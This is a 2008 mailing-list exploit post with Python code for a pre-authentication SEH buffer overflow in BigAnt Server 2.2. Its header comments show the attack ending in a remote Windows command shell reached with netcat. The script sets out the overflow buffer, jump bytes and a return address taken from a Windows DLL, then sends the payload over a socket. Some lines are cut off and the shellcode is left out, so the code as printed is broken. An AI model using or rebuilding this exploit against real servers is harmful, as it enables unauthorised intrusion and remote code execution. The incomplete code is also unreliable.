BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
- From: admin@xxxxxxxxxxxxxxxxxxxxx
- Date: 15 Apr 2008 23:30:12 -0000
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
# bt ~ # ./antserver_exploit.py -H <target-ip> -P 6080   (addresses are redacted in this copy)
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on <target-ip>:<port>
# bt ~ # nc -vv <target-ip> 4444
# inverse host lookup failed: Unknown host
# (UNKNOWN) [<target-ip>] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
# C:\WINNT\system32>
from socket import *
from optparse import OptionParser
import sys
# Startup banner (title and author credits), emitted before option parsing.
# Output is identical to printing each line separately.
_banner = (
    "[*********************************************************************]",
    "[* *]",
    "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]",
    "[* Discovered and Coded By *]",
    "[* Matteo Memelli *]",
    "[* (ryujin) *]",
    "[* www.be4mind.com - www.gray-world.net *]",
    "[* *]",
    "[*********************************************************************]",
)
print("\n".join(_banner))
# Command-line interface.  -H/--target_host and -P/--target_port are stored
# on options.HOST / options.PORT (the port is converted to int by optparse);
# the script checks that both were supplied right after parsing.
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", dest="HOST", type="string",
                  action="store", help="Target Host")
parser.add_option("-P", "--target_port", dest="PORT", type="int",
                  action="store", help="Target Port")
options, args = parser.parse_args()
HOST, PORT = options.HOST, options.PORT
if not (HOST and PORT):
# Exit function: tried the SEH/THREAD/PROCESS variants, but the server crashes
# anyway once the shellcode has run -- expect AntServer.exe to be down
# afterwards, so the service generally needs a restart between attempts.
# [*] x86/alpha_mixed succeeded, final size 698  (encoder output for the
# shellcode; the shellcode bytes themselves are not reproduced in this listing)
shellcode = (
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4 -- an OS-DLL address, so it is
# specific to the tested Win2K SP4 English build and must be re-resolved for
# any other service pack or locale.
# Layout check against the 954-byte SEH offset noted above: 252 NOPs + 698
# bytes of alpha_mixed shellcode = 950, so nSEH (EB 06 90 90) sits at offset
# 950 and the handler at 954.  EB 06 jumps over its two padding NOPs and the
# 4-byte handler to offset 958, the start of the 8-NOP pad; the E9 82 FC FF FF
# that follows (rel32 = -894, taken from offset 971) lands at offset 77 inside
# the NOP sled, which slides forward into the shellcode.
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
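print('[+] Connecting to host...')
s = socket(AF_INET, SOCK_STREAM)
# A filtered port or a host that is already wedged would otherwise block
# connect()/send() forever.
s.settimeout(10)
try:
    # Connect to the endpoint parsed from -H/-P rather than a hard-coded
    # address, so the target given on the command line actually takes effect.
    s.connect((HOST, PORT))
    print('[+] Overflowing the buffer...')
    # Pre-auth trigger: a single oversized request line to AntServer.exe's
    # listener.  sendall() instead of send(): a short write could truncate
    # evilbuf before the SEH record and merely garble the request.
    s.sendall('GET ' + evilbuf + "\n\n")
except error as exc:  # socket.error, provided by the star import
    print('[-] Connection failed: %s' % exc)
    sys.exit(1)
finally:
    s.close()
# NOTE(review): this reports the *target* port.  The usage example in the
# header connects to the shell on port 4444, so the listener port depends on
# the (omitted) shellcode; confirm before relying on this message.
print('[+] Done! Check your shell on %s:%d' % (HOST, PORT))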
# milw0rm.com [2008-04-15]